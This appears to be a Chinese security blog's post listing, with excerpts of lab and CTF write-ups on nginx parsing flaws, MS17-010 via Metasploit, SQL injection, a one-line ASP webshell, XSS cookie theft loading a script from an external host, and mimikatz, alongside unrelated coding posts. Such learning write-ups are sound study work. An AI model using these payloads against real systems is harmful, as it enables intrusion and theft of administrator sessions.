- 博客(16)
- 收藏
- 关注
RSS订阅原创 漏洞复现 nginx解析漏洞
介绍:在图片后面加/.php,可解析为php,该漏洞与Nginx、php版本无关,属于用户配置不当造成的解析漏洞。配置实验环境:目标IP:192.168.8.106开启环境:cd vulhub-master/tomcat/CVE-2017-12615docker-compose up -d步骤:查看目标访问目标地址http://192.168.8.106/漏洞利用一、验证解析漏洞是否存在该靶场存在一个默认的png图片nginx.pn...
2021-04-22 18:06:20
253
原创 漏洞复现 ms17_010
漏洞介绍MS17_010,即大名鼎鼎的永恒之蓝,主要针对SMB服务(默认445端口)展开攻击,可直接拿到目标system权限靶机相关IP:192.168.8.221操作系统:windows server 2003目标已开放默认共享,且防火墙已关闭实践漏洞验证msf6 > search ms17_010msf6 > use auxiliary/scanner/smb/smb_ms17_010msf6 > set r...
2021-04-20 00:25:04
154
原创 html基础学习
一、html页面基础架构<!DOCTYPE html><html lang="zh-CN"> <head> <meta charset="utf-8"> <title>测试网站</title> <meta name="keywords" content="测试" /> <meta name="description" content="这是一个测试网站"> </head> &
2020-12-22 22:30:20
134
1
原创 Sqlilabs lesson1-6
注入步骤判断注入点使用且或非来判断,即and、or、xor一般使用and来进行判断,以第一关为例:http://172.16.54.161/sqli/Less-1/?id=1’ and ‘1’=‘1 返回正确http://172.16.54.161/sqli/Less-1/?id=1’ and ‘1’=‘2 返回错误判断存在注入点判断字段数order by 函数进行判断http://172.16.54.161/sqli/Less-1/?id=1’ order by 4 --+ 返回错误h
2020-06-12 11:36:37
116
原创 safedog在win系统phpstudy环境中遇到的坑
一开始安装安全狗,会弹出服务名不存在,然后查找网上的解决方法,找到以下方法cd c:\phpstudy_pro\Extensisions\Apache2.4.39httpd.exe -k install -n apache2.0然后提醒我权限不够,我便使用管理员权限打开,发现就一个黑黑的命令行界面,上面什么也没有。然后以为是系统问题,就开启另一台win10电脑查看,使用同样方法还是不行,排除系统原因,然后在cmd.exe使用管理员权限打开,进入apache的bin目录,修改服务名就OK了,最后完
2020-05-19 03:02:45
419
原创 Mac 下使用 docker 安装 vulnstudy靶场 初始化postgresql
docker mac版下载:https://hub.docker.com/editions/community/docker-ce-desktop-macvulnstudy 集成靶场下载:https://github.com/c0ny1/vulstudyvulnerable-node中postgresql 问题:Error: Database is uninitialized a...
2020-05-07 21:42:13
789
原创 pyqt5登录界面功能实现
最近做毕设用python实现一个登录界面和个人信息维护界面,主要是用pyqt5模块和sqlite数据库,在借鉴前人的基础上实现注册、登录、注销和密码修改功能。mainwindow.py为登录界面的ui,userwindow.py的ui,login_functions.py为各种功能的实现,start.py用来创造登录和个人信息维护界面以及这两个界面的切换。此仅作参考,欢迎各位大神给我提出意见或建议...
2020-04-15 01:12:23
3132
2
原创 mbp 封神台靶场 七(笔记)
打开链接,还是在上一关的基础上进行操作,接上打开C盘发现有线索。两个关于小芳的文件都打不开。于是首先zip文件和txt文件来对自己进行提权,右键找到属性》安全〉高级,把完全控制从拒绝改成允许。txt文本说解压密码就是Administrator的登录密码。打开文件,发现还需要密码。这需要使用mimikatz工具,在参考中是选择通过上传方式来使用该软件,我考虑到这工具可能服务器上就存在,于是在...
2020-02-09 22:15:59
627
原创 mbp 封神台靶场 六(笔记)
打开链接,根据题目提示,flag在c盘根目录下,接上一关的网页后台,打开c盘,发现确实存在flag.txt,但是提示没有权限。于是知道本关需要我们去进行提权操作,打开D盘,发现cmd.exe和iis6.exe(如果没有可以上传),知道需要用Windows系统来进行操作,于是开启了虚拟机中的windows 7,但还是打不开这个程序,原来是jre环境没装,便去java官网上下了最新版的jre,win...
2020-02-09 21:47:56
1261
原创 mbp 封神台靶场 五 (笔记)
打开链接,发现需要使用上一关的cookie,删除flag并复制放入modheader中即可。或者用burp抓包替换cookie都可以,登录进去显示管理系统界面。看了题目的提示,需要上传脚本上去,搞到它的后台。点开各个页面,发现里面有可以上传的地方。便准备写一个一句话木马上传试一试,新建一个1.txt文件,输入<% eval request('mac') %>即可,并将后缀名改为1...
2020-02-09 20:40:25
840
原创 mbp 封神台靶场 四 (笔记)
打开链接,发现是个留言板,尝试xss注入,看看是否可行。弹出1提示并发现字段变灰,说明注入成功,登录xss平台创建项目。将此代码段植入刚才的区域中<script src=http://xsspt.com/2gVqle></script>然后查看项目内容发现flag总结:本关主要是通过xss注入拿到管理员cookie的,见框就插是xss注入的常用手段,它主要通过用户输入...
2020-02-09 19:53:41
537
1
原创 mbp 封神台靶场 三 (笔记)
打开链接,根据提示进行操作由上可知后台登陆地址为admin123,需要准备的工具是大名鼎鼎的burp(抓包软件)
2020-02-09 18:10:55
984
1
原创 mbp 封神台靶场 二(笔记)
打开第二关的链接,是一个雕塑网页,点开各个链接查看,在新闻动态里点开了一个新闻,发现了熟悉的身影。常理,还是用上一关的方法来测试一下,看看有没有注入点,页面显示数据库出错,即可注入。之后order by函数判断字段数,可知字段数为10。老步骤,知道字段数之后判断回显点,输入union select 0,1,2,3,4,5,6,7,8,9...
2020-02-09 17:25:33
1599
原创 mbp 封神台靶场 一(笔记)
最近在看掌控安全的公开课,里面提到了封神台靶场,因为以前也做过网易云课堂的靶场,便轻车熟路地注册了账号登陆靶场,先看了第一关。第一关是通过SQL注入找到管理员密码,打开链接,点进去一看发现有猫腻。一、寻找注入点看到id=1,便可以用id=1’或id=1 and 1=2来进行测试,以id=1’为例,发现网页出现了错误。二、判断字段数在发现这可以进行SQL注入后便要判断它的字段数,用...
2020-02-09 16:32:29
11443
原创 pip加速更新
因为在使用pycharm时经常需要更新新的库,而在终端使用pip install 又太慢,如:pip install pyqt5直接使用该命令的话一旦下载的包过大就会很慢导致失败,所以在该安装命令后加上-i 镜像地址,比如:pip install pyqt5 -i https://pypi.douban.com/simple下载速度就能从原来的几kbps加速到几Mbps。...
2019-12-30 19:56:57
245
原创 MacBook Pro 关闭指定端口
MacBook Pro 关闭Flask端口用pycharm创建了一个Flask,看到默认端口为loacalhost:5000,在运行完这个项目后,显示故需要在终端输入lsof -i:5000,终端显示`再杀死当前进程输入kill -9 3759即可欢迎使用Markdown编辑器你好! 这是你第一次使用 Markdown编辑器 所展示的欢迎页。如果你想学习如何使用Markdown编辑器, 可...
2019-12-29 22:20:31
701
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人